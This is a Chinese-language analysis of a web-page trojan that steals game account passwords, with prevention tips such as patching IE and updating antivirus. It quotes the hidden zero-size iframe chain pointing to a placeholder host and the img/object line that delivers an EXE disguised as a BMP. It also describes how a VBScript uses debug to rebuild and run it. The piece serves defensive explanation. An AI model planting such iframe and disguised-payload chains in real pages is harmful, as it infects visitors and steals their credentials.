在病毒日益猖獗的今天,其传播的形式也开始丰富多彩起来。除开下载软件,浏览网页、收发邮件、聊天都成为了病毒传播的有利渠道。而网页浏览是使用率最高的网络服务,自从被作为病毒的传播渠道以来,病毒编写者屡屡得手。那病毒是怎么通过网页浏览进行传播的呢?网页病毒主要利用IE漏洞,运行一段恶意代码,绕过安全审查在用户的电脑上安装运行病毒。由于网页病毒的攻击手法较多,恶意代码隐藏在看似正常的网页中,并且对病毒原文件进行了各种伪装,杀毒软件对新病毒的反应速度又有限,因此对用户的安全威胁较大。
网络上隐藏着众多的网页病毒,下面我就以一个传播传奇盗号木马的网页为例,给大家简单介绍一下其传播原理和防范措施。
发现犯罪者
一天,我在浏览一个软件下载网站的时候,无意中发现了一个会传播木马的网页(此地址不是真实地址,将无法访问,下同)(如图3),它会在浏览该网页的用户电脑上安装一个木马,名称为:Trojan.PSW.LMir.wa(瑞星的命名)或PWSteal.Lemir.Gen(诺顿)(如图4),是一个盗取网游传奇帐号密码的木马程序。若不是有最新版本的杀毒软件,想必此木马就无声无息地在我的系统里安家落户了。这个木马会无声无息地进行活动,没有任何中毒迹象。它到底长成啥样?它又有什么本事能在浏览者的系统里扎根?出于好奇,我将此木马Down了下载,大卸八块,好生分析了一番。
Tips:恶意代码变化多样,每天都有新的代码出现,所以随时更新病毒库是预防各种病毒的有效手段之一。
剖析犯罪行为
原来这个木马“犯罪集团”采用协同作案的方式,各成员各施其职,共同完成入侵计划。它由好几个文件组成,包括:174.htm;logo.htm;login.htm;login.bmp;login.asp。下面就让我们来分析一下该木马的“犯罪手法”。
(1)174.htm是一个软件的下载页面,页面结构较为杂乱,正是这杂乱中隐藏着危机。该页的源码里面有这样的一行代码:“<iframe src="http://www.abc.info/abc/logo.htm" width="0" height="0"></iframe>”。这行代码利用了IE的iframe漏洞,它在网页中建立了一个长和高都为0的一个框架,在此框架中打开了一个logo.htm。而IE的安全漏洞导致这样的iframe不会受到安全检查,从而可以被利用来运行恶意代码。这就如同你守着你家大门不让小偷进来,却没有注意敞开的窗户会成为入侵的门路。
(2)我顺藤摸瓜下载了logo.htm。它里面只有一行代码:“<iframe src="http://www.abc.net/admin/images/edit/login.htm" width="0" height="0"></iframe>”,再建立一个框架,并打开login.htm文件。
(3)用记事本打开login.htm,发现也只有一行代码:“<IMG SRC=login.bmp width=0 height=0><object data="login.ASP" width=0 height=0></object>”。很多的网页木马都会采用这样的方法,插入了一个BMP文件,并且运行脚本程序。login.bmp文件实际上是一个经过处理的木马程序,被伪装成了一个BMP文件,而login.asp里面的脚本程序会将login.bmp还原成可执行文件,并且运行木马。
(4)login.bmp被插入到网页里,用户是不可能看到它的,因为这是一个长宽为0的框架,但它会被当作一个图片文件下载到用户的硬盘上,保存在IE临时文件目录里。用16位编辑器打开此文件(如图1)会发现,它是以字符串“BM”开头,这是BMP图片文件的标记。同时你也会发现,往下几行有一个“MZ”,这就是EXE可执行文件的标记。IE在下载可执行程序的时候会进行安全提示,而下载这样一个披着BMP皮的EXE木马则不会有任何的警觉,杀毒软件也会视而不见。这一招将“瞒天过海”发挥得淋漓尽致。
(5)Login.asp是用VBScript编写的。它的主要任务是从临时文件中找到login.bmp,并且调用系统里的debug程序(如图2),剥去login.bmp前面的内容,将其还原成login.exe,并且运行。披着羊皮的狼露出了真面目,开始作案了。它之所以能够成功地达到目的,是因为IE的安全漏洞让它有足够的权限运行脚本,并可以调用系统里的程序。利用这样的漏洞,恶意代码还可以格式化硬盘,篡改注册表。其中包含有容错和重试代码,最大程度地保证该程序的正常运行。
就这样,一个木马就成功地在浏览者的电脑上安家了。如果系统里的杀毒软件无法识别这样的恶意代码,用户丝毫不会有察觉,在浏览网页的同时就受到了攻击。
除了浏览网页,现在流行的电子书(CHM)也可以使用类似的手法来传播木马。CHM电子书一般是由网页制作而成的,在里面捆绑上木马,也不用伪装,并且在本地电脑上执行也不会受到安全审查,威胁性更大了。
如何预防
看到这里,可能有些读者就怕了:“太危险了!那我以后就不上网了!”。就现在的情况来说,由于杀毒软件的查杀机制所限(一般采用特征码识别),杀毒软件只能是在病毒出现后来进行亡羊补牢,但是对于网页木马来说,我们还是可以采取相应的措施将危害大大减低。
(1) 安装微软Windows和IE的最新补丁。
漏洞会不断地被发现,而一些威胁性较大的漏洞发现后不久就会有相应的病毒出现,不过微软的补丁也会在漏洞发现后的第一时间发布。所以即时打补丁可以降低病毒入侵的可能性。大家可以登陆www.microsoft.com/china下载最新的补丁包。
(2) 使用新版杀毒软件,并升级到最新的病毒库。
较新的病毒库可以识别出绝大部分病毒,即使恶意代码已运行,病毒程序运行的时候还是会被发现,这样就大大降低了风险。
而新版杀毒软件对恶意脚本、恶意邮件都有较好的识别能力,可以将危险扼杀在萌芽状态。
(3) 不要随便浏览信用度不高的网站。
网络上的各种网站鱼目混杂,有很多陷阱等着浏览者上钩。杀毒软件也不是万能的,尽量登陆一些名气较大的网站可以在很大程度上避免安全威胁。
(4) 尽量在一些大的电子书网站下载电子书籍。
注意:病毒测试具有较高的危险性,请不要随意尝试!
当前位置: